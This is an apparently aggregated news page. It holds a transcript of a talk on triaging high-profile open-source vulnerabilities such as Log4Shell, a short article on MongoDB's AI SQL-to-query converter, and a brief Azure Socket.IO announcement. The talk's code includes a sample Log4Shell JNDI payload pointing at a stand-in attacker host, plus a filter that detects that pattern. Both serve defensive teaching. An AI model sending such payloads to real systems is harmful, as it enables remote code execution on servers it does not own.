Presentation: Celebrity Vulnerabilities: Effective Response to Critical Production Threats

MMS Founder
MMS Alyssa Miller

Article originally posted on InfoQ. Visit InfoQ

Transcript

Miller: I’m Alyssa Miller. We’re digging into celebrity vulnerabilities. I’m a hacker, a researcher, a cybersecurity author, and a cybersecurity executive. I’m also a pilot. Last year, I tackled something super exciting, a lifelong dream. I’ve always wanted to be a pilot, but it always seemed out of reach. Then the stars aligned last year, I started training. It took a few months, and then I ended up buying my own airplane. It took a few more months, then I finally passed my check ride, as they call it, which is how I earned my private pilot certificate. I’m officially a pilot. Being a pilot, and being an aircraft owner as well, I learned a lot about what the aviation community does, when it comes to handling a crisis. There’s a lot of things obviously that can go wrong in aviation. I’m going to share some of them with you. We’re going to talk about a little bit of what the FAA in the United States does, because that’s what I’m most familiar with. A lot of these processes are similar with other agencies around the globe. I want to talk to you a little bit about this, because as I started to learn this, I realized there’s some applicability here to how we handle cybersecurity incidents.

Aircraft Grounding Analogy to Celebrity Vulnerabilities

One aviation incident, we’ll call it, or critical emergency you might be very familiar with, is this one here. This is the Boeing 737 MAX 8. I’m sure a lot of you heard in the news at some point about the issues with the Boeing 737 MAX 8. There were problems that led to a couple crashes that killed a lot of people. As a result, all 737 MAX 8 aircraft around the globe were grounded. They didn’t know what was wrong. They knew there was a big problem on their hands, and they knew they had to fix it. They found out pretty quick what was causing it, but they really had to figure out how they were going to fix it. In the meantime, they grounded all of these planes. That ended up changing a lot of flight routes. It affected a lot of travelers when these airlines suddenly had fewer planes that they could fly. Some like Southwest Airlines in the United States were really heavily hit because 737s are all they fly. They had a lot of MAX 8 versions of the 737. They were able to recover. They have a lot of resources, a lot of aircraft in these various airlines. Overall, they were able to recover fairly easily.

What happens when it’s not an airline being impacted? What happens when it’s someone like me, who maybe only owns one aircraft? This aircraft here is not mine, but this is a Cirrus SR22. Very popular aircraft. Cirrus has been in the market for about 20 to 25 years, something like that. They’ve been making this aircraft. This aircraft is powered by this engine, a Continental IO-550. You don’t need to know all that information, but understand that the way airplanes come together in the first place, it’s not like cars. A lot of times you build a car, the same automaker that builds the body and builds the seats and does all that stuff, builds the engines and everything else. Airplanes aren’t like that. Airplanes are a lot like how we build software. Different companies make different components and we plug all that together into an aircraft. Continental is a company that makes small aircraft engines. They make piston aircraft engines like this IO-550. Why am I talking about this? That IO-550 from Continental has an issue right now, and it’s caused the grounding of a lot of planes. One of the ones in particular that’s heavily hit is the SR22. Why is it grounded? Because they have an issue with a crankshaft counterweight. You don’t even need to understand what that is either. Understand that because of this issue, they’ve had to ground a bunch of planes. People who only have one plane suddenly don’t have an airplane to fly. I got to thinking, that sounds like how we approach when we have celebrity vulnerabilities. It’s this all-hands-on-deck, we have to stop all of the development we’re doing, no development work goes on, we have to fix these problems. That’s all we can do. It’s like the grounding of an aircraft.

Celebrity Vulnerabilities – Apache Struts

What do I mean by celebrity vulnerabilities? That’s a term I borrowed from a coworker. When I’m talking about celebrity vulnerabilities, I’m talking about those big, open source, most cases, vulnerabilities that get all the press in the media that we have dealt with quite a bit in the last five to six years. One of the first ones that I can really remember was this vulnerability, the CVE-2017-5638. It was a Struts vulnerability. When it came out, it was fairly critical. It was a high CVSS score. Everybody was worried about it. It was very high severity. A lot of us rushed out and fixed it. Unfortunately, for this company, Equifax, they missed fixing some of them. As a result, they got breached. Actually, at the time, the biggest breach of consumer data in the history of recorded breaches. It all stemmed from this Struts vulnerability that had been well publicized, but didn’t necessarily get fixed properly.

Log4j

A little closer to home, some of you might remember, in the more recent past, after those 164 million consumers were impacted, we had a new vulnerability show up. It was in this cool little package, Java developers might remember, Log4j. How many of you use that? We had that cool vulnerability, Log4Shell. Everybody blew up. It was all the news, all the rage. Everybody was scrambling to fix it. We had CVE-2021-44228. Then we had CVE-2021-45046. Then we had CVE-2021-45105. All of these vulnerabilities that started showing up related to Log4j. We started fixing when the first one was announced. Then we realized, there’s another vulnerability in that version, so we need another new version of Log4j. Then they released another version of Log4j. The reality of all of this was, yes, 91% of Java apps in the world were impacted by this. If you’re a Java developer, chances are you had to drop everything, you had to run out and reset all of the work you were doing and focus on fixing this vulnerability. What of course made it more complex was not only were 91% of those Java apps impacted, 61% of those were impacted via some indirect dependency. It wasn’t even a direct dependency that developers had included in their code. It was, I’ve got a dependency that also brings in Log4j with it. It wasn’t always the easiest to discover. I got that data from my friends at Snyk, who released quite a bit of information regarding these particular vulnerabilities. That was 2021.
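
To make that exposure concrete, here is a minimal sketch of the pattern that made Log4Shell exploitable, assuming a vulnerable Log4j 2.x release is on the classpath; the controller class and header are hypothetical examples, not something from the talk.

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import javax.servlet.http.HttpServletRequest;

public class LoginController {

    private static final Logger log = LogManager.getLogger(LoginController.class);

    // With a vulnerable Log4j 2.x on the classpath (even pulled in as an indirect
    // dependency), logging attacker-controlled input is enough: a crafted header value
    // such as ${jndi:ldap://attacker.example/a} triggers a JNDI lookup when the
    // message is formatted.
    public void handleLogin(HttpServletRequest request) {
        log.info("Login attempt, User-Agent: {}", request.getHeader("User-Agent"));
    }
}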

Spring4Shell

It wasn’t too long after that we did the whole thing all over again, because we had this wonderful vulnerability that we named Spring4Shell. Now it’s Spring, another super common package that a lot of people use in their code. We had one CVE, then two CVEs, then three CVEs again. We went through the same thing. As researchers found the first vulnerability, then they started digging deeper, they started finding more vulnerabilities. Before we knew it, we had three really high severity vulnerabilities in Spring that we had to deal with. Again, developers across the globe were called upon to stop everything they were doing, drop it all on the floor, and go to work trying to fix these vulnerabilities in all of their software. It’s exhausting.

OpenSSL

Then, the end of last year, OpenSSL shows up on the scene. Rumors started popping up, and they started getting confirmed by the maintainers that there’s some big announcement about a big vulnerability coming, but no information until five days later. What happened five days later? After everybody dropped everything, got all excited and all set to fix yet another celebrity vulnerability, they dropped the news of the vulnerability and it just wasn’t even that serious. Over time, we became conditioned by these multiple celebrity vulnerabilities that we need to drop everything and rush out and fix it because there’s going to be this critical vulnerability. As soon as attackers find out about it, they’re going to come knocking at our door, they’re going to be hacking our applications, and we need to fix it. Then we got slapped in the face by OpenSSL when it ended up being much ado about just a little bit. There’s got to be a better way.

Avoiding ‘All-Hands-On-Deck’ Approach

Throughout these, I was right there with you. I’ve been working in cybersecurity the last 15 years, but I was on the other side of this. I was on the side of the cybersecurity folks who were like, this is really scary. I was also, in my experience, fighting for, how can we not stir up the whole world, throw everybody’s development pipelines into upheaval, and shut everything down, just to fix this? How can we be smarter? That’s what I was fighting for in my organizations as these things were going down. When it comes to celebrity vulnerabilities like this, we have to work on avoiding that all-hands-on-deck approach, that drop all the things you’re working on and come fix this, because it’s not necessary. It’s not efficient. It doesn’t make us more secure necessarily. Ultimately, it conditions us for incorrect behaviors.

Let’s talk about a real process. This process is based on my experience working with these vulnerabilities over the last number of years. I’m going to share with you what I learned, some of the things we were able to do in my organizations in order to address these in a more efficient fashion. When it comes to avoiding that all-hands-on-deck approach, there’s three key factors we need to keep in mind. First is prioritization. We need to look at, truly, what is the most immediate attack surface? With Log4j initially, everybody was screaming, upgrade Log4j to the latest, you’d have to get the latest and greatest. As it turns out, if you weren’t on a 2.x version, and actually a version higher than 2.8, you were not vulnerable to this JNDI vulnerability everybody was so worried about. First of all, we just have to understand the most immediate attack surface. Then we need to really establish some classifications for in-scope items, because we’re going to use that then to lay out a roadmap for the actions that we are going to take. In the aviation community we have this saying that, in an emergency, first thing you should do is wind your watch. The point of that is, when you’re presented with an emergency in aviation, we don’t want you to instantly react and start flailing around trying to do all the things. We want you to stop, think methodically, and work through a checklist on how to address the situation to try to troubleshoot it, to try to resolve it, or then to respond in an emergency fashion. We need to do the same. That starts with prioritizing.

Next, we need to look at mitigations. Mitigations do a few things for us. They focus on delaying the attacks, not perfection. They need to be things that we quickly implement. We should be looking to layer them to complement those various mitigations, so that what we end up doing creates an overall decently secure situation while we then go and try to work on fixing the vulnerabilities in our code. Then, finally, we have to work on that remediation. How are we actually going to remediate the vulnerabilities in our code? We need to focus on, what is critical that has to be fixed right now. That goes back to our prioritization. Versus, what can we fix via business-as-usual processes, our normal vulnerability management program, perhaps? How do we leverage our backlogs to do that? How do we establish ongoing tracking to make sure that we do complete all the remediation in some specified timeline? Let’s dig into this process a little bit more. Along the way, I’m going to help you see how some of those approaches in aviation can be a great guide for us.

Prioritize – Identify the Most Immediate Attack Surface

Let’s start with identifying the most immediate attack surface. In aviation, when there’s an emergency, one of the first places we can turn is this here. This is what we call the equipment list, or the minimum equipment list, or the standard equipment list. It gets a lot of different names. This is the equipment list for my airplane that you saw way back at the beginning. These are all the things that were installed in that aircraft the day it rolled off the assembly line. As things are added and removed, all of that has to be noted in logs. What that means is I constantly have an inventory of exactly what is in my airplane, so that if news comes out about a particular defect that needs to be addressed, I know exactly whether or not it applies to my aircraft. It’s a wonderful thing. When it comes to software now, we understand that that’s not always the easiest thing to do. I alluded to this before. Modern day open source development, we have this idea of dependencies. Those dependencies can have their own dependencies, which can then have their own dependencies. I’m sure many of you are familiar with the idea of a dependency tree. It’s those indirect dependencies that get us. That’s what bit Equifax with that Struts vulnerability. They missed it because it was buried a few layers deep in their transitive dependencies of some open source package that they had included in their software. They didn’t even know it was there. It got discovered by an attacker, they got breached.

There’s tools to help with this. Of course, typically, this is something that you’d love to see in your development pipeline. I talked about Snyk before, Black Duck, WhiteSource, ShiftLeft. These are all companies who make what we call software composition analysis, which is a tool that goes through your dependencies and discovers where you have open source dependencies, and alerts you when they’re vulnerable. That’s a great preparatory thing, but we’re not talking about preparations here. We’re talking about, what do you do when you find this in your environment, or there’s a new celebrity vulnerability you need to figure out if it’s in your environment? The good news is, in each of those cases, each of those celebrity vulnerabilities, starting with Log4j, each one of these tool vendors released detection tools as soon as they were able. In most cases, they could be accessed via their freemium product. You could download a free copy of Snyk for instance. You could connect it to your repo. You could let it run. It would go through your dependency tree, and it will tell you immediately if you had a Log4j dependency anywhere in that dependency tree. You can look to these tools to help you. What you’re trying to do is understand, first of all, do you even have that dependency? Then, secondly, and these tools do this to varying degrees, is that vulnerability even reachable in your code? Because if it’s in a particular function that you’re not even using, and there’s no way to access that particular object or something through the functionality of your application, then that’s probably something you can prioritize further down.

Prioritize – Establish Classifications of In-Scope Items

That leads to our next facet of prioritization, which is establishing classifications of in-scope items. You need to understand what is in scope. In the aviation world, we release what the FAA calls Airworthiness Directives. There’s different terms for them in different agencies. Ultimately, they’re the same thing. It’s a notice that says, this defect was discovered, and here’s the aircraft that are affected or potentially affected. They list them by model number, by serial number, by manufacture date, all sorts of different criteria that tell you, this plane is involved, or it’s not involved, so that you can look at it very quickly and know, does this apply to me or not? Many of these Airworthiness Directives then go further, saying, these are aircraft that are most critical and need to be addressed right away. These are aircraft that can wait until a later date, and so on. That’s what we want to do with the software. We want to look at the software and say, here’s the applications that we need to address right away. Here’s ones that we’re going to address second, or we might use some type of mitigating control, or whatever, and here’s ones that are down the road a little bit later to be addressed.

How do we do this? We want to look at three key facets. We want to look at risk. We want to consider the risk. Our critical applications are probably ones that we want to prioritize higher. We might look at the user load, is it an application that’s used by a lot of users, or is it something that’s an internal utility app? What about monitoring capability? Those applications that we have no monitoring for, we’re probably going to consider a little higher risk, because we can’t watch them to see if there’s unusual activity or something that’s actively trying to exploit the vulnerability that’s just been announced. Then we want to consider exploitability. Is it internet facing? If it’s not, obviously, that’s typically something where we can lower the risk picture of that, and it’ll probably be in a later classification. What level of protected access does it have? Maybe it’s something that’s not available to the internet, but we do expose it to clients over certain connections. Those connections might be a way that attackers could find their way to that particular application. What other environmental aspects? How is it hosted? Where is it hosted? Is it hosted in a cloud? Is it a SaaS application? Do you have an on-prem data center that it’s being hosted in? What security controls are in place? All of that is going to play into not only which classification does it go in as far as for remediation, but even, how do you remediate it, or how do you look at mitigating controls?

Then you want to look at just the ease of addressing it. Is it a current code base, or is it something that’s out of date? We’re looking here for those low hanging fruit items. What can we knock out quickly? Maybe those are ones that we want to do first, because we can just knock them out, while we spend more time digging into ones where maybe it’s more difficult. Is the upgrade that’s needed going to be backward compatible? When we were looking at Log4j, if you were on 2.8 and you were trying to get to, I think 2.14 and then 2.15, there wasn’t necessarily backward compatibility in all of the objects and all of the methods within those versions. That was problematic. Or, worse yet, if you had a 1.x version, it definitely wasn’t backward compatible. You need to consider that as you’re classifying your applications. Then, again, mitigations. Do you have some other way to mitigate the risk of that application in the short term? That can be a way that you also classify those applications.
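
To make those classification questions concrete, here is a rough sketch of how they could be encoded; the attributes, thresholds, and application names are illustrative assumptions, not a standard.

import java.util.List;

// Hypothetical triage helper: sorts in-scope applications into remediation classes
// based on the factors discussed above (risk, exploitability, ease of addressing).
public class VulnTriage {

    enum RemediationClass { FIX_NOW, FIX_NEXT, BUSINESS_AS_USUAL }

    record AppProfile(String name,
                      boolean vulnerableCodeReachable,
                      boolean internetFacing,
                      boolean behindWaf,
                      boolean monitored) {}

    static RemediationClass classify(AppProfile app) {
        if (!app.vulnerableCodeReachable()) {
            return RemediationClass.BUSINESS_AS_USUAL;  // not on the immediate attack surface
        }
        if (app.internetFacing() && !app.behindWaf()) {
            return RemediationClass.FIX_NOW;            // exposed and unmitigated
        }
        if (app.internetFacing() || !app.monitored()) {
            return RemediationClass.FIX_NEXT;           // mitigated, or internal but hard to watch
        }
        return RemediationClass.BUSINESS_AS_USUAL;      // internal, mitigated, observable
    }

    public static void main(String[] args) {
        List<AppProfile> portfolio = List.of(
            new AppProfile("public-api", true, true, false, true),
            new AppProfile("internal-reporting", true, false, false, false));
        portfolio.forEach(app -> System.out.println(app.name() + " -> " + classify(app)));
    }
}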

Prioritize – Lay Out a Roadmap for Actions

Then you’re going to use that prioritization to lay out a roadmap for your actions. In the aviation community, I talked about those Airworthiness Directives or those ADs as we call them. This is what happens in those. Remember, I was talking about that IO-550 engine that’s in the SR22 and other aircraft? This is an excerpt from the Airworthiness Directive for that. You see, they very specifically lay out the steps for how you go about remediating. It’s a plan. Each one of these steps gives you instructions based on what’s discovered. As you get through this further, it tells you different things, not shown here, but as you discover different elements, what are the required actions. In some cases, you might have to remove the entire engine and have it rebuilt. In other cases, you don’t have to do anything at all. Having that plan of action and understanding what you’re going to do for each classification is important. What does that look like when we’re talking about our applications? Those roadmaps can be one of two things. They could be sequential. It could be, we’re going to implement this mitigation first. Then we’re going to do this set of remediations. Then we’re going to do another set of remediations. Or they might be things that you can do in parallel. It might be mitigations and remediations that are happening at the same time. Maybe somebody is working on network mitigation while your developers are starting to dig into the code and figure out how they are going to get to the next version of that package. Sometimes these intermix. You might be setting up some that are concurrent, and some that are sequential.

Laying out that roadmap is crucial, because this is part of having a plan. That’s back to that wind your watch thing I mentioned, where we talk about in the aviation community: slow down, address it methodically. Look at the situation, understand what you’re being faced with, and prioritize appropriately. Then lay out the plan for how you’re going to get to remediation. That is the single biggest key. When we went through this with Log4j, I was the sole person in that room saying, we’re not going to go in and send developers hog wild trying to fix every single bit of code. Let’s stop, and let’s talk about this, what are the aspects, or what are the characteristics of the applications that we need to fix first? Let’s list out the mitigating controls that we can put in place, and let’s lay out a plan for how we’re going to address these.

Mitigate – Focus on Delaying Attacks, Not Perfection

Let’s dig into mitigating controls. What are mitigating controls? First of all, mitigating controls are focused on delaying attacks. They are not about perfection. When I talk about the 737 MAX 8, the problem with that airplane ultimately, is this thing right here. It’s what we call an angle of attack sensor. Basically, what this sensor tells you is, what is the aircraft’s pitch relative to ultimately its forward motion. That’s not 100% accurate. It basically says, if I’m flying level and straight, that’s a low angle of attack. If I pitch up, now my angle of attack increases. If I pitch up and I also start to climb because of that pitch, that could actually decrease it a little bit, depending on speed and other things. It’s about, what is my relative motion through the air? It’s this angle of attack sensor that was the problem. If you know about the situation with the 737 MAX 8, you know what they didn’t do was go and immediately start trying to fix these sensors. Instead, they created a software fix to address the hardware problem. Does this sound familiar to you developers, because I’ve been there?

What do we do in our space, when we’re dealing with a vulnerability like one of these celebrity vulnerabilities? We want to look at what mitigations do we have. With Log4j, I was very fortunate that we had Akamai as our CDN. Along with it as a CDN, it also comes with a web application firewall. AWS has their WAF. Cloudflare has a web application firewall. What that did was that gave us an immediate ability to start to look for those incoming JNDI requests that were the problem. It was basically an exploit of that particular functionality within Log4j, so we could use our web application firewalls to do that. We also had endpoint protection. In my organization, it was CrowdStrike. You might also have Carbon Black, or you might be using Microsoft Defender for endpoints, or any other of the myriad of endpoint detection and response tools that are out there in the market. Again, there, it wasn’t long after the vulnerability was announced that those makers were releasing detection rules that could find that and help block against attacks. It wasn’t fixing the underlying software at all. It wasn’t going into the code of the applications and fixing it, but we had these other layers that could at least help prevent some of those attacks. Of course, right away, people started to find ways to bypass the WAF rules and things like that, and it was a back and forth. Again, it’s not about perfection. It’s about delaying the attacks, while you take some time to actually fix the code and take care of that particular package that was vulnerable in your software.
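
As a sketch of what one extra layer can look like inside the application itself, here is a crude servlet filter that rejects requests carrying the obvious ${jndi: pattern in a header, assuming a Servlet 4.0+ container. It is an illustrative assumption, not a replacement for the WAF and endpoint protections just described, and exactly this kind of naive match is what attackers quickly learned to bypass.

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.util.Collections;

// Stopgap mitigation only: block requests whose headers contain the ${jndi: marker.
public class JndiLookupBlockingFilter implements Filter {

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        for (String name : Collections.list(request.getHeaderNames())) {
            String value = request.getHeader(name);
            if (value != null && value.toLowerCase().contains("${jndi:")) {
                ((HttpServletResponse) res).sendError(HttpServletResponse.SC_FORBIDDEN);
                return;  // drop the request before it reaches any logging code
            }
        }
        chain.doFilter(req, res);
    }
}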

Mitigate – Quickly Implemented to Reduce Risk

Mitigations, the next key is they need to be quickly implemented to reduce risk. With the Cirrus aircraft and that IO-550 from Continental, Cirrus came out right away and grounded all of their own aircraft and suggested anybody that was flying an affected aircraft do the same. That’s a mitigating factor. It’s something that can be done very quickly to make sure that people don’t die. That’s what it comes down to. In their case, grounding planes was a quick and easy mitigating control. Again, doesn’t fix the problem, but delays the issue until the problem can be fixed. One thing that you can leverage here, if you hadn’t heard of this before, is the ModSecurity Core Rule Set from OWASP, the Open Web Application Security Project. Get familiar with them at owasp.org. The ModSecurity Core Rule Set is just a set of vendor-agnostic web application firewall rules. Many vendors’ web application firewalls can use these general rules from the ModSecurity Core Rule Set to implement new detections and protections in their application firewalls. As you can see here, it was very quickly after the vulnerability in Log4j was announced that this rule set was updated with detections and protections for that Log4j vulnerability. It was continually updated as the multiple CVEs were being released, and new details were being found, new bypasses were being discovered. Again, they were updating it, trying to detect those bypasses and continue to protect us against attack. That’s an easy way to implement web application firewall rules. They’re going to keep you safe, again, while you work on other tactics to remediate the vulnerability in your environment.

Mitigate – Layer or Complement Mitigation Techniques

Then, finally, from the mitigation, we need to remember that we want to look for ways to layer or complement these mitigation techniques, because they’re not perfect. Where we know there’s a weakness in one particular mitigation, we want to add in other mitigations to help. I talked before, like those web application firewalls, and those EDR tools, these endpoint detection response tools, those are two ways that even if they bypass the web application firewall, maybe that endpoint tool will find the vulnerability, and see the attack and block it. What does that look like in the aviation community, when we talk about that 737 MAX 8? Take a look at this green column over here. This is everything they did to implement that software fix. Notice, it’s not just one thing. They made adjustments to the MCAS. That’s the software that we’re talking about here. That software is ultimately what reads the input from the angle of attack sensor. It was getting erroneous data from that sensor and reacting in ways that weren’t predictable. What did they do? They, first of all, made sure that it wouldn’t just accept one input, it had to get input from multiple sensors. They added a disagree light then that said, something’s going on here, I’m not getting the right information, one of these sensors is wrong. Rather than react and pitch the airplane down into the ground, which is what was happening, it instead did nothing and just said, the sensors are giving me two different messages. They also added a pilot override, which was another problem, as these planes were pitching down into the ground, the pilots were unable to override the system easily. Then they focused on pilot training, because it was found that the pilots didn’t know how to react in this situation.

What does that look like when we’re talking about mitigations? When we’re talking about mitigations, we want to block wherever possible. We can block the attack, or we can block access to certain functions. We want to do that. That is the key. That is our best mitigation, because that stops the attack. If we can’t do that, we want to at least focus on isolation. How can we isolate those vulnerable apps? How can we keep them in their own environment, so at least if something happens, and they get breached, it doesn’t become a launchpad for much greater scope of attack against our organization. We want to make sure we layer that in with the blocking. Then, finally, we want to log everything. Turn on all the logging you can in these moments, because your security people are going to be looking for what we call indications of compromise. They’re going to be looking for those attacks or those attempted attacks. Turning on logging on your CDNs, on your WAFs, on your web servers, start looking through those access logs, turn up the logging capabilities, turn up the logging capability within your application itself. Then make sure you’re feeding that somewhere. Or at least creating that data so your security team can come along and take care of digging through that to see if indeed someone’s trying to attack you.

Remediate – Define Critical Remediation vs. Business-As-Usual

Now let’s talk about remediation. Remediation is where we’re really fixing the applications. We’re going in and we’re replacing those vulnerable libraries, or we’re making some code fix, or doing whatever we need to. I say, we need to look first and foremost. This was a big sticking point for me when we were dealing with Log4j. It was, what do we have to fix right away, versus what can I log to my vulnerability management database? We just fix it in our normal course of addressing vulnerabilities. This is key. This is a core aspect to this because this is how you get out of the mode of fix it all, fix it all right now. We shut everything else down. Looking at the aviation community, now I’m going to talk about my plane. This is my airplane. This is a Piper PA-28. It’s the Cherokee series of aircraft. There are a bunch of different models of this. What you see on the right is what we call a wing spar. That wing spar is what attaches the wing to the fuselage of the aircraft. You can see there, it’s basically a steel I-beam sort of thing that runs through about maybe two-thirds of the wing and it has that little piece that sticks out, that gets bolted to the fuselage of the aircraft.

My aircraft, the PA-28, that type of aircraft has a problem where these things literally experience corrosion, and they experience fatigue cracking, and it can literally lead to the wings falling off. The FAA came out with guidance that specified what aircraft based on what characteristics were susceptible to this, and needed varying levels of investigation, repair. It was based in part on how many hours the plane had flown, but also what type of use the plane had seen, and some other factors. You had to calculate all this out. We want to be doing the same when it comes to our software. We want to use a risk matrix like this. Maybe you’ve seen this, this works great. We want to understand, what are the applications that have to get fixed right now? What are the ones that are running Log4j 2.8 or greater, they’re internet accessible, and they’re not behind a WAF, a web application firewall? Those are obviously the most critical, because we can’t mitigate it. They’ve got the vulnerable versions, and they’re open to the world. We got to fix that first. If it’s internal and it’s running Log4j 2.5, which wasn’t vulnerable to that particular attack, later, it was vulnerable to one of the other CVEs, but maybe that’s one we can decrease in risk and not have to remediate as quickly. Laying out those remediation timelines, and saying, for those ones that are less critical, rather than make that the thing we’re going to just fix as soon as possible. Let’s go back, maybe we have vulnerability management standards that say we’ve got 60 days to fix that. Let’s log it as such and fix it using that process.

Remediate – Leverage your Backlogs

To that end, that means, let’s leverage our backlogs. Even if you don’t have a vulnerability management program, for those apps that don’t fall into that critical got to fix it right now category, log an issue on your backlog. Put it out there, make it a P1, P2, whatever fits for you, but put it on the backlog and fix it in your next release. Now it’s just part of your normal process. An example of this with that wing spar situation, I mentioned the corrosion. First of all, when the FAA released it, it wasn’t, ground your aircraft and look right now. It was, within the next 100 flight hours of the aircraft, you have to go and complete this, installing inspection panels and whatever. You can see it was 100 hours or 12 months, within 12 months. There, it’s not a, you can’t fly this plane until you do this inspection, and comply with this service directive, or this Airworthiness Directive. No, they gave you time, so that you could continue your normal work, and then just fix it. Aircraft have to undergo inspections every 12 months anyway. Maybe when you go in for your annual inspection, you could just take care of it then, business-as-usual. Yes, throw it in your backlog. Put it out there, fix it the way that you fix all your other security vulnerabilities. It’s a high-risk severity, critical vulnerability that everybody is screaming about in the media. It’s a celebrity vulnerability. Everybody says you got to fix it now. Let’s be realistic about this. Let’s look at where we can afford the time. Let’s not scramble to fix everything at once. Let’s fix the things that have to be fixed, put everything else in the backlog.

Remediate – Establish Ongoing Tracking of Each Classification

Then we do need to track, ongoing, what are we going to do about this? Because you know as well as I do what happens in these cases, is if you don’t track this, they get forgotten about, they never get fixed. In the aviation world, remember I mentioned those annual inspections? This is what I keep. It’s called a Squawk list. Every little thing that I notice is not right about my airplane, things that don’t affect safety, but they’re just a problem that I want to have addressed, I keep a list. Then, for some of them, maybe when I take it in for an oil change, I have them look at it, or when I take it in for annual, I have them look at it. I keep a list and you see here I note the resolutions when they’ve been achieved. For that last one in particular, you can see there it was inspected. I’m not ready to say that it’s resolved, so I’m going to keep looking at it and keep inspecting it over time to make sure that it isn’t a crack that I have to worry about.

We need to do the same thing with the software. We need to track each of the apps in each of those classifications and say, so for those critical ones, the ones I said I have to fix right now, we’re at 90%, we still have 10% to go. For ones that we completely backlogged, they were low severity, we’ve got 95% of them we haven’t touched yet, and only 5% because maybe they were low hanging fruit, and they were easy to fix, we fixed. Keeping that tracking going is how you make sure that you get through all of these. It’s what’s going to get your security team off your butt and stop bugging you to fix it. Because you can say, “We’re working on it. We’ve got this. They’re logged. They’re going to get fixed in this timeframe. We’re on track. We’re this far along.” That’s going to be really important. It makes sure that you don’t get any surprises like we saw with Equifax.

Review

Just to review, again, prioritize, mitigate, and then remediate. Slow down, fix it one step at a time in a methodical process. That is the key here. Avoid that all-hands-on-deck approach. Remember this quote from Winston Churchill, “Perfection is the enemy of progress.” If we are so focused on completely eradicating a vulnerable package from our environment, we’re going to get so wrapped around trying to be perfect, we’ll never get anything fixed. We will fail to protect ourselves, and the chances of us getting breached, go up.




MongoDB automates SQL translation for its NoSQL database • The Register – TheRegister

MMS Founder
MMS RSS

Posted on nosqlgooglealerts. Visit nosqlgooglealerts

MongoDB has built an AI-powered SQL converter designed to help developers move from relational databases to its document-oriented NoSQL system.

One analyst told us that there is more to database migrations than converting SQL, and it remains unclear how much the product’s features would help productivity given the scale of migration projects in terms of testing and validation.

The move, which automates the translation of SQL into MongoDB’s own query language, is one of a raft of new GenAI-type features added to its database service, Atlas, that aim to smooth the developer experience and save time writing code.

MongoDB Compass lets developers use natural language to write executable MongoDB Query API syntax while incorporating other features. For example, developers can type “Filter pizza orders by size, group the remaining documents by pizza name, and calculate the total quantity,” to generate the relevant code, MongoDB said.
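
To give a sense of what that kind of prompt maps to, here is a rough sketch of an equivalent aggregation written by hand with the MongoDB Java driver; the connection string, collection, and field names (orders, size, name, quantity) are assumptions for illustration, not output from Compass.

import com.mongodb.client.MongoClients;
import com.mongodb.client.MongoCollection;
import org.bson.Document;

import java.util.List;

import static com.mongodb.client.model.Accumulators.sum;
import static com.mongodb.client.model.Aggregates.group;
import static com.mongodb.client.model.Aggregates.match;
import static com.mongodb.client.model.Filters.eq;

public class PizzaTotals {
    public static void main(String[] args) {
        try (var client = MongoClients.create(System.getenv("MONGODB_URI"))) {
            MongoCollection<Document> orders =
                client.getDatabase("demo").getCollection("orders");

            // "Filter pizza orders by size, group the remaining documents by pizza name,
            // and calculate the total quantity"
            orders.aggregate(List.of(
                    match(eq("size", "medium")),
                    group("$name", sum("totalQuantity", "$quantity"))))
                .forEach(doc -> System.out.println(doc.toJson()));
        }
    }
}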

Meanwhile, MongoDB Atlas Charts allows users to create data visualizations using natural language.

MongoDB Relational Migrator promises to automatically convert SQL queries and stored procedures in legacy applications to development-ready MongoDB Query API syntax by using a large language model. All three are available in preview.

Chief product officer Sahir Azam told The Register that between a quarter and a third of MongoDB’s customer projects have involved migrating an old database to its JSON-based system.

“A developer can either copy and paste in an existing SQL statement from their code or we can connect to a relational database and import view definitions or stored procedures, which are complex business logic in the database,” he said. “It’ll analyse that code via a large language model, and then spit out the appropriate MongoDB query language equivalent. And then the goal is to make that more accurate over time using reinforcement learning.”
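
To illustrate the sort of translation he is describing, a statement like SELECT * FROM orders WHERE status = 'A' AND qty > 10 roughly corresponds to the following with the MongoDB Java driver; the table, columns, and values here are assumptions rather than Relational Migrator output.

import com.mongodb.client.MongoClients;

import static com.mongodb.client.model.Filters.and;
import static com.mongodb.client.model.Filters.eq;
import static com.mongodb.client.model.Filters.gt;

public class SqlToMqlSketch {
    public static void main(String[] args) {
        try (var client = MongoClients.create(System.getenv("MONGODB_URI"))) {
            var orders = client.getDatabase("demo").getCollection("orders");

            // Rough equivalent of: SELECT * FROM orders WHERE status = 'A' AND qty > 10
            orders.find(and(eq("status", "A"), gt("qty", 10)))
                  .forEach(doc -> System.out.println(doc.toJson()));
        }
    }
}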

Analyst Matthew Aslett, veep and research director with Ventana Research, said: “Database migrations are far from easy, they’re very costly, very complex. Anything that can help facilitate them is a good thing and it is a useful use case, particularly for the generative AI capabilities. Obviously, it’s something that can look very good in a simple demo, but if you’re looking at large scale, really complex queries, it remains to be seen how helpful it will be.”

James Governor, co-founder of developer-focused analyst Redmonk, said MongoDB was not necessarily ahead of the competition in exploiting generative AI.

“Generative AI is so powerful that everyone is able to take advantage of them,” he said. “It’s not the competitive advantage in a sense of using OpenAI or not using it. GPT4 is going to be arriving soon and that’s going to be a lot better at writing code. It’s going to be able to write code for any of these platforms, and it’s going to understand databases. It’s not that any of the database companies are going to be massively ahead but on the other hand, you can’t shut yourself off from those sorts of productivity enhancements.” ®



Microsoft Introduces Public Preview of Socket.IO Support on Azure Web PubSub

MMS Founder
MMS Steef-Jan Wiggers

Article originally posted on InfoQ. Visit InfoQ

Microsoft recently added support for Socket.IO on Azure in public preview, allowing developers to leverage a fully managed cloud solution through Web PubSub for Socket.IO.

Azure Web PubSub for Socket.IO is a new capability that manages client connections for an application using the Socket.IO library – an open-source library for real-time messaging between clients and a server. Instead of managing multiple Socket.IO servers or adapters in a self-hosted Socket.IO, developers can migrate it to Web PubSub for Socket.IO.

When developers host a Socket.IO app themselves, clients establish WebSocket or long-polling connections directly with their server. Maintaining such stateful connections places a heavy burden on the Socket.IO server – limiting the number of concurrent connections and increasing messaging latency. An option is to scale out to multiple Socket.IO servers. Yet, it requires a server-side component called an adapter, which introduces an extra component a developer needs to deploy and manage, including writing additional code.

